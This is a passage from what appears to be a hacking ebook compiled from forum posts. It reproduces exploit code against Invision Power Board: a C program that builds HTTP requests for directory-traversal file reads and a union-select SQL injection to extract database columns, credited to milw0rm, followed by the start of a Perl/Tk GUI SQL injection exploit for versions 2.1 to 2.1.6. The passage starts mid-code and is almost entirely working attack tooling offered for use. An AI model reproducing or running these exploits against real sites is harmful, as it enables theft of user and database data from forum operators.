Hacker Professional Ebook part 382 pptx

strcatexploit, host; strcatexploit, "\r\n\r\n"; printf"\n\n\n[!] u can get database prefix from this error.

char * localfile = argv[5];

char * host = argv[3];

if (strcmp(type,"1")==0)

{

char exploit[1024];

strcpy(exploit, "GET /");

strcat(exploit, path);

strcat(exploit,

"?act=module&module=gallery&cmd=viewimage&img=&file_type=&dir=");

strcat(exploit, localfile);

strcat(exploit, " HTTP/1.0\r\nHost: ");

strcat(exploit, host);

strcat(exploit, "\r\n\r\n");

Exploit(exploit, "readfile", host);

}

else if (strcmp(type,"2")==0)

{

char exploit[1024];

strcpy(exploit, "GET /");

strcat(exploit, path);

strcat(exploit, "?act=gallery&code=viewimage&img=index.gif&dir="); strcat(exploit, localfile);

strcat(exploit, " HTTP/1.0\r\nHost: ");

strcat(exploit, host);

strcat(exploit, "\r\n\r\n");

Exploit(exploit, "readfile", host);

}

// - sql-injection exploit - //

}

if(strcmp(mode,"sqlinject")==0)

{

char * host = argv[2];

char * path = argv[3];

char * prefix = argv[5];

char * column = argv[4];

char * table = argv[6];

char * id = argv[7];

char exploit[1024];

strcpy(exploit, "GET /");

strcat(exploit, path);

strcat(exploit,

"?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20union%20select%201,");

strcat(exploit, column);

strcat(exploit, ",1,1,1,1,1,1,1,1%20FROM%20"); strcat(exploit, prefix);

strcat(exploit, table);

strcat(exploit, "%20WHERE%20id=");

strcat(exploit, id);

strcat(exploit, "/*31337*/");

strcat(exploit, " HTTP/1.0\r\nHost: ");

strcat(exploit, host);

strcat(exploit, "\r\n\r\n");

Exploit(exploit, "sqlinject", host);

}

if (strcmp(mode,"getprefix")==0)

{

char * path = argv[3];

char * host = argv[2];

char exploit[1024];

strcpy(exploit, "GET /");

strcat(exploit, path);

strcat(exploit,

"?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew");

strcat(exploit, " HTTP/1.0\r\nHost: ");

strcat(exploit, host);

strcat(exploit, "\r\n\r\n");

printf("\n\n\n[!] u can get database prefix from this error example: SELECT * FROM <PREFIX>gallery_albums\n\n");

Exploit(exploit, "readfile", host);

}

WSACleanup();

return 0;

}

// milw0rm.com [2006-10-03]

Chú ý code nên để trong tab [code] [_/code]

famydmx(HCE)

Invision Power Board 2.1 <= 2.1.6 Remote SQL Injection Exploit

Code:

#!/usr/bin/perl

## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC

## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41

## http://rst.void.ru/papers/advisory41.txt

## tested on 2.1.3, 2.1.6

##

## 08.06.06

## (c)oded by 1dt.w0lf

## RST/GHC

## http://rst.void.ru

## http://ghc.ru

use Tk;

use Tk::BrowseEntry;

use Tk::DialogBox;

use LWP::UserAgent;

$mw = new MainWindow(title => "r57ipb216gui" );

$mw->geometry ( '420x550' ) ;

$mw->resizable(0,0);

$mw->Label(-text => '!', -font => '{Webdings} 22')->pack();

$mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();